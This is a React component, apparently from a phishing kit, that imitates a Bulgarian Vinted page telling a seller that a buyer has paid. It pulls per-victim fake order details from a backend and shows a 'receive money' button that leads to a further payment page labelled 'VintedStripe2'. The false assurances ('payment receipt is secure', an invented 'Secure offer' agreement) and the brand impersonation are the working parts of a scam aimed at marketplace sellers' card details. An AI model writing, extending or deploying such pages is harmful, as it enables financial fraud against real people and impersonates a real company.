import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './BgVintedSuccess.css';
import SupportWidget from './SupportWidget';
import BgMarketplaceDecoRow from './BgMarketplaceDecoRow';
import { API_URL } from '../apiBase';
import { getPrimaryCurrency, CURRENCY_SYMBOL } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
/** Официално лого Vinted (визуално „светло“ чрез CSS filter върху тъмен topbar) */
const VINTED_LOGO_LIGHT_SRC = `${process.env.PUBLIC_URL || ''}/vinted-logo.png`;
const BGV_SUCCESS_BANNER_SRC = `${process.env.PUBLIC_URL || ''}/bg-order-paid-banner.png`;

function CheckCircleIcon() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="none" aria-hidden>
      <circle cx="12" cy="12" r="10" fill="#00a651" />
      <path
        d="M8 12l2.5 2.5L16 9"
        stroke="#fff"
        strokeWidth="2"
        strokeLinecap="round"
        strokeLinejoin="round"
      />
    </svg>
  );
}

/**
 * Vinted BG — екран след капча; бутон към index2 (VintedStripe2). Официално лого: public/vinted-logo.png (стил за тъмен topbar в CSS).
 */
function BgVintedSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) return;
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCode}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'BG').toUpperCase();
  const primary = getPrimaryCurrency(countryCode);
  const sym = CURRENCY_SYMBOL[primary] || '€';

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null) return 0;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : 0;
  })();

  const priceText =
    Number.isFinite(priceNumber) && priceNumber % 1 === 0
      ? String(priceNumber.toFixed(0))
      : String(priceNumber);

  const fn = (pageData?.first_name || '').trim();
  const ln = (pageData?.last_name || '').trim();
  const address = (pageData?.delivery_address || '').trim() || '—';
  const productTitle = (pageData?.product_name || '').trim() || '—';
  const photoUrl = pageData?.photo_url || '';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="bgv-wrap">
        <div className="bgv-topbar">
          <div className="bgv-topbar-inner">
            <span className="bgv-logo-wrap">
              <img src={VINTED_LOGO_LIGHT_SRC} alt="Vinted" className="bgv-logo-img" width={128} height={32} />
            </span>
          </div>
        </div>
        <div className="bgv-loading">Зареждане…</div>
        <div className="bgv-support">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="bgv-wrap">
      <header className="bgv-topbar">
        <div className="bgv-topbar-inner">
          <a href="#/" className="bgv-logo-wrap" aria-label="Vinted">
            <img src={VINTED_LOGO_LIGHT_SRC} alt="Vinted" className="bgv-logo-img" width={128} height={32} />
          </a>
        </div>
      </header>

      <main className="bgv-main">
        <div className="bgv-layout">
          <div className="bgv-col-left">
            <h1 className="bgv-page-title">Получаване на плащане от купувача</h1>

            <div className="bgv-item-card">
              <div className="bgv-item-thumb">
                {photoUrl ? (
                  <img src={photoUrl} alt="" />
                ) : (
                  <div className="bgv-thumb-placeholder" aria-hidden />
                )}
              </div>
              <div className="bgv-item-meta">
                <p className="bgv-item-price">
                  {priceText} {sym}
                </p>
                <p className="bgv-item-name">{productTitle}</p>
              </div>
            </div>

            <div className="bgv-success-banner-wrap">
              <img
                src={BGV_SUCCESS_BANNER_SRC}
                alt="Вашият артикул е издаден! Купувачът вече е платил за поръчката."
                className="bgv-success-banner-img"
              />
            </div>

            <BgMarketplaceDecoRow wrapClass="bgv-deco-row" imgClass="bgv-deco-img" />

            <section className="bgv-delivery" aria-labelledby="bgv-delivery-h">
              <h2 id="bgv-delivery-h" className="bgv-delivery-heading">
                Подробности за доставката
              </h2>
              <div className="bgv-field">
                <span className="bgv-field-label">Адрес за доставка</span>
                <span className="bgv-field-value">{address}</span>
              </div>
              <div className="bgv-name-grid">
                <div className="bgv-field">
                  <span className="bgv-field-label">Фамилия</span>
                  <span className="bgv-field-value">{ln || '—'}</span>
                </div>
                <div className="bgv-field">
                  <span className="bgv-field-label">Първо име</span>
                  <span className="bgv-field-value">{fn || '—'}</span>
                </div>
              </div>
            </section>

            <div className="bgv-instructions">
              <p>
                След получаване на средствата, моля, изпратете стоките на купувача според дадените данни или предайте
                стоките на куриера, който ще ви се обади в рамките на 12 часа.
              </p>
              <p>
                След изпращането на стоките, моля, посочете на купувача номер на доставката! Стоките трябва да бъдат
                изпратени в рамките на 3 дни след получаване на средствата.
              </p>
            </div>
          </div>

          <aside className="bgv-aside" aria-label="Действие">
            <div className="bgv-aside-card">
              <p className="bgv-aside-price">
                {priceText} {sym}
              </p>
              <Link to={index2Path} className="bgv-aside-btn">
                Получаване на пари
              </Link>
              <div className="bgv-secure-row">
                <CheckCircleIcon />
                <span className="bgv-secure-text">Получаването на плащане е сигурно</span>
              </div>
              <p className="bgv-aside-legal">
                С натискането на бутона &quot;Получаване на пари&quot; се съгласявате с условията на Споразумението с
                потребителя, като използвате онлайн услугата &quot;Сигурна оферта&quot;.
              </p>
            </div>
          </aside>
        </div>
      </main>

      <div className="bgv-support">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default BgVintedSuccess;
